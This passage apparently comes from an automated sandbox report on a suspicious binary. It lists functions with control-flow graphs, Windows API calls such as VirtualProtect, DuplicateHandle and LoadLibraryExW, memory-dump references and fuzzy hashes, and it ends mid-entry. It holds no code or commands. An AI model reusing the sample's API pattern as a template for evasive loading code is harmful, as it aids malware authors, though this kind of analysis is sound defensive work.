                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 05A4B5DB Relevance: 6.1, APIs: 4, Instructions: 121threadCOMMON
                                                                                                                                                    Download Yara Rule

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    control_flow_graph 296 5a4b5db-5a4b659 GetCurrentProcess 297 5a4b662-5a4b696 GetCurrentThread 296->297 298 5a4b65b-5a4b661 296->298 299 5a4b69f-5a4b6d3 GetCurrentProcess 297->299 300 5a4b698-5a4b69e 297->300 298->297 302 5a4b6d5-5a4b6db 299->302 303 5a4b6dc-5a4b6f7 call 5a4b798 299->303 300->299 302->303 306 5a4b6fd-5a4b72c GetCurrentThreadId 303->306 307 5a4b735-5a4b797 306->307 308 5a4b72e-5a4b734 306->308 308->307
                                                                                                                                                    APIs
                                                                                                                                                    • GetCurrentProcess.KERNEL32 ref: 05A4B648
                                                                                                                                                    • GetCurrentThread.KERNEL32 ref: 05A4B685
                                                                                                                                                    • GetCurrentProcess.KERNEL32 ref: 05A4B6C2
                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 05A4B71B
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.307989570.0000000005A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A40000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_5a40000_tDb0ggawON.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Current$ProcessThread
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2063062207-0
                                                                                                                                                    • Opcode ID: 565b93a04c8d9e4798c7f3dac851711dc8083cf77c79a07a0085a67e805fa340
                                                                                                                                                    • Instruction ID: 334f229e3a17e4bb4cce5720c70529fb7b06d357594bd41d26b579b1dbb03f59
                                                                                                                                                    • Opcode Fuzzy Hash: 565b93a04c8d9e4798c7f3dac851711dc8083cf77c79a07a0085a67e805fa340
                                                                                                                                                    • Instruction Fuzzy Hash: 3D5154B49002498FDB10CFA9D989BEEBBF1BF88308F248859E019B7350DB749845CF65
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 05A4B5E8 Relevance: 6.1, APIs: 4, Instructions: 120threadCOMMON
                                                                                                                                                    Download Yara Rule

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    control_flow_graph 315 5a4b5e8-5a4b659 GetCurrentProcess 316 5a4b662-5a4b696 GetCurrentThread 315->316 317 5a4b65b-5a4b661 315->317 318 5a4b69f-5a4b6d3 GetCurrentProcess 316->318 319 5a4b698-5a4b69e 316->319 317->316 321 5a4b6d5-5a4b6db 318->321 322 5a4b6dc-5a4b6f7 call 5a4b798 318->322 319->318 321->322 325 5a4b6fd-5a4b72c GetCurrentThreadId 322->325 326 5a4b735-5a4b797 325->326 327 5a4b72e-5a4b734 325->327 327->326
                                                                                                                                                    APIs
                                                                                                                                                    • GetCurrentProcess.KERNEL32 ref: 05A4B648
                                                                                                                                                    • GetCurrentThread.KERNEL32 ref: 05A4B685
                                                                                                                                                    • GetCurrentProcess.KERNEL32 ref: 05A4B6C2
                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 05A4B71B
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.307989570.0000000005A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A40000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_5a40000_tDb0ggawON.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Current$ProcessThread
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2063062207-0
                                                                                                                                                    • Opcode ID: 2b0beb7dec38bb434eba3ad26ecc518cafaba196628594c7dd92862e9b350eef
                                                                                                                                                    • Instruction ID: 908e7d3c8a25cff1f54bffc46987b7c099150f8ef86e561bb440dcbf65b151fb
                                                                                                                                                    • Opcode Fuzzy Hash: 2b0beb7dec38bb434eba3ad26ecc518cafaba196628594c7dd92862e9b350eef
                                                                                                                                                    • Instruction Fuzzy Hash: B35156B09006498FDB10CFA9D988BDEBBF5FF88308F208859E019A7350DB749844CF65
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 05A491A8 Relevance: 1.7, APIs: 1, Instructions: 221COMMON
                                                                                                                                                    Download Yara Rule

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    control_flow_graph 334 5a491a8-5a491bd call 5a4846c 337 5a491d3-5a491d7 334->337 338 5a491bf 334->338 339 5a491d9-5a491e3 337->339 340 5a491eb-5a4922c 337->340 388 5a491c5 call 5a494cc 338->388 389 5a491c5 call 5a49468 338->389 390 5a491c5 call 5a49478 338->390 339->340 345 5a4922e-5a49236 340->345 346 5a49239-5a49247 340->346 341 5a491cb-5a491cd 341->337 344 5a49308-5a493d9 341->344 382 5a493ed-5a4942a GetModuleHandleW 344->382 383 5a493db-5a493ea 344->383 345->346 348 5a49249-5a4924e 346->348 349 5a4926b-5a4926d 346->349 350 5a49250-5a49257 call 5a48478 348->350 351 5a49259 348->351 352 5a49270-5a49277 349->352 355 5a4925b-5a49269 350->355 351->355 356 5a49284-5a4928b 352->356 357 5a49279-5a49281 352->357 355->352 358 5a4928d-5a49295 356->358 359 5a49298-5a492a1 call 5a48488 356->359 357->356 358->359 364 5a492a3-5a492ab 359->364 365 5a492ae-5a492b3 359->365 364->365 367 5a492b5-5a492bc 365->367 368 5a492d1-5a492de 365->368 367->368 369 5a492be-5a492ce call 5a48498 call 5a484a8 367->369 373 5a492e0-5a492fe 368->373 374 5a49301-5a49307 368->374 369->368 373->374 384 5a49433-5a49461 382->384 385 5a4942c-5a49432 382->385 383->382 385->384 388->341 389->341 390->341
                                                                                                                                                    APIs
                                                                                                                                                    • GetModuleHandleW.KERNELBASE(?), ref: 05A4941A
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.307989570.0000000005A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A40000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_5a40000_tDb0ggawON.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: HandleModule
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 4139908857-0
                                                                                                                                                    • Opcode ID: e62d7cec4d8bf600c83d68347ee79b24be9e12cc244f9a2ed498bc58fa21c7ec
                                                                                                                                                    • Instruction ID: 9a0629cc8d8900afb24b90864eddde912bfb58e38b1d5f62858e4ed3aa723e66
                                                                                                                                                    • Opcode Fuzzy Hash: e62d7cec4d8bf600c83d68347ee79b24be9e12cc244f9a2ed498bc58fa21c7ec
                                                                                                                                                    • Instruction Fuzzy Hash: 4F912570A00B058FDB24CFA9D544A9BBBF6FF88204F04892AE45AE7B50D774E855CF91
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 05A4509C Relevance: 1.6, APIs: 1, Instructions: 126COMMON
                                                                                                                                                    Download Yara Rule

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    control_flow_graph 493 5a4509c-5a4513e 496 5a45145-5a451ac CreateActCtxA 493->496 498 5a451b5-5a4523a 496->498 499 5a451ae-5a451b4 496->499 508 5a45267-5a4526f 498->508 509 5a4523c-5a4524c 498->509 499->498 513 5a45270 508->513 512 5a45253-5a4525f 509->512 512->508 513->513
                                                                                                                                                    APIs
                                                                                                                                                    • CreateActCtxA.KERNEL32(?), ref: 05A45199
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.307989570.0000000005A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A40000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_5a40000_tDb0ggawON.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Create
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2289755597-0
                                                                                                                                                    • Opcode ID: c1c23f8c288a9b02e4b7ec2a08e8e7a851b13ccd52095847604955ed776e49a9
                                                                                                                                                    • Instruction ID: 9979a058d07a79fd88211569dbf2b7f33a413c99067cea3e09486c6092e9ef15
                                                                                                                                                    • Opcode Fuzzy Hash: c1c23f8c288a9b02e4b7ec2a08e8e7a851b13ccd52095847604955ed776e49a9
                                                                                                                                                    • Instruction Fuzzy Hash: 0A51E871D0021DCFDB20DFA8C885BCEBBB5BF59304F1084AAD409AB251DB716A89CF51
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 05A43C10 Relevance: 1.6, APIs: 1, Instructions: 126COMMON
                                                                                                                                                    Download Yara Rule

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    control_flow_graph 472 5a43c10-5a451ac CreateActCtxA 477 5a451b5-5a4523a 472->477 478 5a451ae-5a451b4 472->478 487 5a45267-5a4526f 477->487 488 5a4523c-5a4525f 477->488 478->477 492 5a45270 487->492 488->487 492->492
                                                                                                                                                    APIs
                                                                                                                                                    • CreateActCtxA.KERNEL32(?), ref: 05A45199
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.307989570.0000000005A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A40000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_5a40000_tDb0ggawON.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Create
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2289755597-0
                                                                                                                                                    • Opcode ID: c536fc360d85c734f634637b6958fa05e6e16572a63d617e87c03738b29a91ff
                                                                                                                                                    • Instruction ID: 87e45a8873be3c20857980bb30f0f52bc4652bae035958c30fa38774b19d8a80
                                                                                                                                                    • Opcode Fuzzy Hash: c536fc360d85c734f634637b6958fa05e6e16572a63d617e87c03738b29a91ff
                                                                                                                                                    • Instruction Fuzzy Hash: 9E51D771D0021DCFDB20DFA8C884BDEBBB5BF59304F1084A9D509AB250DB716A89CF91
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 05A4B810 Relevance: 1.6, APIs: 1, Instructions: 108COMMON
                                                                                                                                                    Download Yara Rule

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    control_flow_graph 514 5a4b810-5a4b8eb DuplicateHandle 515 5a4b8f4-5a4b934 514->515 516 5a4b8ed-5a4b8f3 514->516 516->515
                                                                                                                                                    APIs
                                                                                                                                                    • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 05A4B8DB
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.307989570.0000000005A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A40000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_5a40000_tDb0ggawON.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: DuplicateHandle
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3793708945-0
                                                                                                                                                    • Opcode ID: 6482d24b1601deb604ea5e856f71420df92302eb8d98509b8e2d013bc2331bd0
                                                                                                                                                    • Instruction ID: f3cbb5b2f0a6ba7605a032d4f6f56ec1acb0323d96bf9a33d0ede20cb43f8c63
                                                                                                                                                    • Opcode Fuzzy Hash: 6482d24b1601deb604ea5e856f71420df92302eb8d98509b8e2d013bc2331bd0
                                                                                                                                                    • Instruction Fuzzy Hash: D34156B9D002589FCF00CFE9D984ADEBBF5BB59310F14942AE818BB210D375A955CF54
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 05A4B809 Relevance: 1.6, APIs: 1, Instructions: 107COMMON
                                                                                                                                                    Download Yara Rule

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    control_flow_graph 520 5a4b809-5a4b8eb DuplicateHandle 521 5a4b8f4-5a4b934 520->521 522 5a4b8ed-5a4b8f3 520->522 522->521
                                                                                                                                                    APIs
                                                                                                                                                    • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 05A4B8DB
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.307989570.0000000005A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A40000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_5a40000_tDb0ggawON.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: DuplicateHandle
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3793708945-0
                                                                                                                                                    • Opcode ID: f27994d10bf185d77eeefae4e3044fb8f61efda2c65f3a2a3ef9f1d3bd0ef7c6
                                                                                                                                                    • Instruction ID: 969fee67dcffc3e49a102e89b31bd1b38e284ebcac8a24353fa816317fdb059e
                                                                                                                                                    • Opcode Fuzzy Hash: f27994d10bf185d77eeefae4e3044fb8f61efda2c65f3a2a3ef9f1d3bd0ef7c6
                                                                                                                                                    • Instruction Fuzzy Hash: 8E4164B9D042599FCF00CFE9D984ADEBBF5BB09310F24942AE818BB210D334A955CF54
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 017F7EC8 Relevance: 1.6, APIs: 1, Instructions: 98memoryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • VirtualProtect.KERNELBASE(?,?,?,?), ref: 017F7F77
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.302142797.00000000017F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017F0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_17f0000_tDb0ggawON.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ProtectVirtual
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 544645111-0
                                                                                                                                                    • Opcode ID: bc3549eaa8a8489cd0fb4989aa7f79fd109a4a436851f9574842bc0ef6fdacf2
                                                                                                                                                    • Instruction ID: 282c00bd21db3102fbaf7e35f9ff6a9fa401e42785c1db7d156e37848ea8d8c1
                                                                                                                                                    • Opcode Fuzzy Hash: bc3549eaa8a8489cd0fb4989aa7f79fd109a4a436851f9574842bc0ef6fdacf2
                                                                                                                                                    • Instruction Fuzzy Hash: 6F31B8B9D042589FCB10CFA9D880ADEFBF0AB09314F24902AE814B7310D374A946CFA4
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 05A484D0 Relevance: 1.6, APIs: 1, Instructions: 97libraryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • LoadLibraryExW.KERNELBASE(?,?,?), ref: 05A49742
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.307989570.0000000005A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A40000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_5a40000_tDb0ggawON.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: LibraryLoad
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1029625771-0
                                                                                                                                                    • Opcode ID: 9cae66de51f82227cab782211fd69a06e8f369caa90b690adfbc9470832fea32
                                                                                                                                                    • Instruction ID: 34764978e390675fbd37b13477d236a6be2c43d408cc5dcbd2ef4debb7f5f5f3
                                                                                                                                                    • Opcode Fuzzy Hash: 9cae66de51f82227cab782211fd69a06e8f369caa90b690adfbc9470832fea32
                                                                                                                                                    • Instruction Fuzzy Hash: BE4177B8D052589FCB10CFE9D884ADEFBF5BB49314F14942AE928B7210D374A945CF94
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 05A49690 Relevance: 1.6, APIs: 1, Instructions: 96libraryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • LoadLibraryExW.KERNELBASE(?,?,?), ref: 05A49742
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.307989570.0000000005A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A40000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_5a40000_tDb0ggawON.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: LibraryLoad
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1029625771-0
                                                                                                                                                    • Opcode ID: c5f0d1d6594a26818d7cd0cb0d9f2d5d5ca0441fb2c8afe4761df39ee65f88e9
                                                                                                                                                    • Instruction ID: b3b7a3a328d4e24e1ad943f95aefa10b0fafed8a690fd89a64ae7ced77357a3a
                                                                                                                                                    • Opcode Fuzzy Hash: c5f0d1d6594a26818d7cd0cb0d9f2d5d5ca0441fb2c8afe4761df39ee65f88e9
                                                                                                                                                    • Instruction Fuzzy Hash: BB4178B9D042589FCB10CFA9D884ADEFBF5BB59324F14942AE824B7210D374A945CF54
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 017F7ED0 Relevance: 1.6, APIs: 1, Instructions: 94memoryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • VirtualProtect.KERNELBASE(?,?,?,?), ref: 017F7F77
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.302142797.00000000017F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017F0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_17f0000_tDb0ggawON.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ProtectVirtual
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 544645111-0
                                                                                                                                                    • Opcode ID: c5a2d32b1dfb5ef7bff3beb7a9d48a9c518310a4fbcaaacac4f3c0a9990871a2
                                                                                                                                                    • Instruction ID: 4cd2b44fc444c617c60302d34493cefb20ec867468c1b682300f741fb99e20ba
                                                                                                                                                    • Opcode Fuzzy Hash: c5a2d32b1dfb5ef7bff3beb7a9d48a9c518310a4fbcaaacac4f3c0a9990871a2
                                                                                                                                                    • Instruction Fuzzy Hash: CB3197B9D042589FCB14CFA9D884ADEFBF4BB19314F24902AE814B7310D774A945CFA4
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 09F17740 Relevance: 1.6, APIs: 1, Instructions: 89windowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • PostMessageW.USER32(?,?,?,?), ref: 09F177E3
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.311047408.0000000009F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 09F10000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_9f10000_tDb0ggawON.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: MessagePost
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 410705778-0
                                                                                                                                                    • Opcode ID: a8c08104d059bb3f5029826b705d0a2a1b617d6d23554175d75677eb7eb0cea3
                                                                                                                                                    • Instruction ID: a33d34bd198af52234c946a556146fd70bf320ddda23ca0558c0498290a6dfaf
                                                                                                                                                    • Opcode Fuzzy Hash: a8c08104d059bb3f5029826b705d0a2a1b617d6d23554175d75677eb7eb0cea3
                                                                                                                                                    • Instruction Fuzzy Hash: 0D31AAB9D002589FCF10CFA9E984ADEFBF0AB59310F24901AE818B7310D775A945CF54
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 09F17748 Relevance: 1.6, APIs: 1, Instructions: 85windowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • PostMessageW.USER32(?,?,?,?), ref: 09F177E3
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.311047408.0000000009F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 09F10000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_9f10000_tDb0ggawON.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: MessagePost
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 410705778-0
                                                                                                                                                    • Opcode ID: c5d988f7db59f0ce6028482b2a0860e234f7e52731edd17185acf2aea439de4d
                                                                                                                                                    • Instruction ID: f8ffc34b406905b1ab5a3fb647474d2006129afa7145d852fae26093364d86f2
                                                                                                                                                    • Opcode Fuzzy Hash: c5d988f7db59f0ce6028482b2a0860e234f7e52731edd17185acf2aea439de4d
                                                                                                                                                    • Instruction Fuzzy Hash: 053179B9D002589FCB10CFA9D984ADEFBF4AB19310F24941AE828B7310D775A945CF94
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 05A49388 Relevance: 1.6, APIs: 1, Instructions: 76COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetModuleHandleW.KERNELBASE(?), ref: 05A4941A
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.307989570.0000000005A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A40000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_5a40000_tDb0ggawON.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: HandleModule
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 4139908857-0
                                                                                                                                                    • Opcode ID: 7deea8803d1f2f31ca00649ff13ff5a704757cb01d7bae9569937402424b14be
                                                                                                                                                    • Instruction ID: c5d3bf7725b5b2c0d49f8e881f85218ec6a58cff5938a219220cd0b3e08b04cc
                                                                                                                                                    • Opcode Fuzzy Hash: 7deea8803d1f2f31ca00649ff13ff5a704757cb01d7bae9569937402424b14be
                                                                                                                                                    • Instruction Fuzzy Hash: 34318AB4D002599FCB14CFA9D984ADEFBF5AB49314F14906AE814B7310D374A945CFA4
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 05A49468 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetModuleHandleW.KERNELBASE(?), ref: 05A4941A
                                                                                                                                                      • Part of subcall function 05A484D0: LoadLibraryExW.KERNELBASE(?,?,?), ref: 05A49742
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.307989570.0000000005A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A40000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_5a40000_tDb0ggawON.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: HandleLibraryLoadModule
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 4133054770-0
                                                                                                                                                    • Opcode ID: f9133bae8ee9e1613d54271470395bdb9eb477bae52a9e2281baa07971865eee
                                                                                                                                                    • Instruction ID: c2c9563912bd0309ec84e38ae8386d98cdf55de11dab7807ee44e4028c9c7e99
                                                                                                                                                    • Opcode Fuzzy Hash: f9133bae8ee9e1613d54271470395bdb9eb477bae52a9e2281baa07971865eee
                                                                                                                                                    • Instruction Fuzzy Hash: 3B118C31E042099FDB14DFEAE844AEFF7B9ABC9214F14806AD915F7241CA7898058FA0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Non-executed Functions

                                                                                                                                                    Function 017F5308 Relevance: 5.2, Strings: 4, Instructions: 155COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.302142797.00000000017F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017F0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_17f0000_tDb0ggawON.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: [a(6$eW)$eW)$hqr
                                                                                                                                                    • API String ID: 0-2027486457
                                                                                                                                                    • Opcode ID: 67473e6bec981a0b3069c5fb915366ba01342708c1ec8e6a589f9a9e13d796e6
                                                                                                                                                    • Instruction ID: 78c576435f2cd61c7f889fbe12179f2c2438c054b5a7aae220ca0a3c2fec44f7
                                                                                                                                                    • Opcode Fuzzy Hash: 67473e6bec981a0b3069c5fb915366ba01342708c1ec8e6a589f9a9e13d796e6
                                                                                                                                                    • Instruction Fuzzy Hash: 91610F74E15209CBCB04CFA9D9809EEFBF2FF89210F24946AD515BB324D334AA018F59
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 017F4A58 Relevance: 3.9, Strings: 3, Instructions: 160COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.302142797.00000000017F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017F0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_17f0000_tDb0ggawON.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: vdu$vdu$vdu
                                                                                                                                                    • API String ID: 0-2517124486
                                                                                                                                                    • Opcode ID: d3471855f618862f59479aed6214da33c15db7b7c6f5c34094b9a5fe8e262748
                                                                                                                                                    • Instruction ID: 69258e5300818ec77ffe07463738858436257b14c519c7aaac2588b61ac6d50d
                                                                                                                                                    • Opcode Fuzzy Hash: d3471855f618862f59479aed6214da33c15db7b7c6f5c34094b9a5fe8e262748
                                                                                                                                                    • Instruction Fuzzy Hash: 8671C2B4E0024ADFCB04CFA9C5809AFFBB2FF48210F14955AD516A7305D334AA86CF99
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 017F4A48 Relevance: 3.9, Strings: 3, Instructions: 158COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.302142797.00000000017F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017F0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_17f0000_tDb0ggawON.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: vdu$vdu$vdu
                                                                                                                                                    • API String ID: 0-2517124486
                                                                                                                                                    • Opcode ID: 7f925a4ff49cc05919ae3ea047d4579cc479d902a68cadc36b3f3b1ba2511d49
                                                                                                                                                    • Instruction ID: b48d52e5a11d6f58aad5986ed1c2a615191217dadc9d7d02bc6bc7bbc4a0d870
                                                                                                                                                    • Opcode Fuzzy Hash: 7f925a4ff49cc05919ae3ea047d4579cc479d902a68cadc36b3f3b1ba2511d49
                                                                                                                                                    • Instruction Fuzzy Hash: BB61D174E0420ADFCB04CFA9C5809AFFBB2BF88210F18855AD516A7305D334AA82CF95
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 017F52F8 Relevance: 3.9, Strings: 3, Instructions: 153COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.302142797.00000000017F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017F0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_17f0000_tDb0ggawON.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: [a(6$eW)$hqr
                                                                                                                                                    • API String ID: 0-1907746043
                                                                                                                                                    • Opcode ID: 5b2a5bbd7373b1fe7f2e3df740d6cd16de6093036562632ae5182d7e5d713690
                                                                                                                                                    • Instruction ID: 7a60b259e14442e9d6a744cb610d7e51fe0160e69ce546812441f4fc2b8e1a77
                                                                                                                                                    • Opcode Fuzzy Hash: 5b2a5bbd7373b1fe7f2e3df740d6cd16de6093036562632ae5182d7e5d713690
